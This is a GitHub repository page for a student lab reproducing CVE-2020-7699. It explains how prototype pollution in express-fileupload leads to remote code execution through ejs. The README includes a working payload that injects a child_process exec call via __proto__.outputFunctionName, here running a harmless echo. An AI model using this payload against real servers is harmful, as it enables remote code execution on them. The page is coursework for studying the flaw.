Skip to content
/ CVE-2020-7699_reproduce Public

针对 CVE-2020-7699 的复现,软件安全原理课程大作业

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

hemaoqi-Tom/CVE-2020-7699_reproduce

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits

README.cn.md

README.cn.md

 
 

README.md

README.md

 
 

index.ejs

index.ejs

 
 

index.js

index.js

 
 

launch_attack.py

launch_attack.py

 
 

package.json

package.json

 
 

Repository files navigation

CVE-2020-7699 Reproduction

Reproduction for Node.js RCE vulnerability(CVE-2020-7699), my lab work

Setup

Node.js edition: v14.16.1, please make sure that the edition of Node.js is 14(Other edition will propably work, I didn't test)

Python edition:3.9.5, Python is only used to send HTTP attack request, no specific edition required

Just clone the repo, npm i to install dependencies. I offered 2 more cmds:

  • using npm run start-server to start the target server(victim server)
  • using npm run launch-attack to launch the attack

Analysis

express-fileUpload: edition below 1.1.10 will be affected

In express-fileUpload exists prototype pollution

Vulnerability: express-fileUpload prototype pollution

How to make use of it: to pollute __proto__.outputFunctionName in order to write the cmd to exec. eg. echo "ATTACK SUCCESSFUL" > attacked.txt

exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

In ejs exists RCE

Vulnerability: ejs will try to execute xxx.outputFunctionName which is undefined, but if object.outputFunctionName is polluted, it'll exec it instead

About

针对 CVE-2020-7699 的复现,软件安全原理课程大作业

Resources

Readme
Activity

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages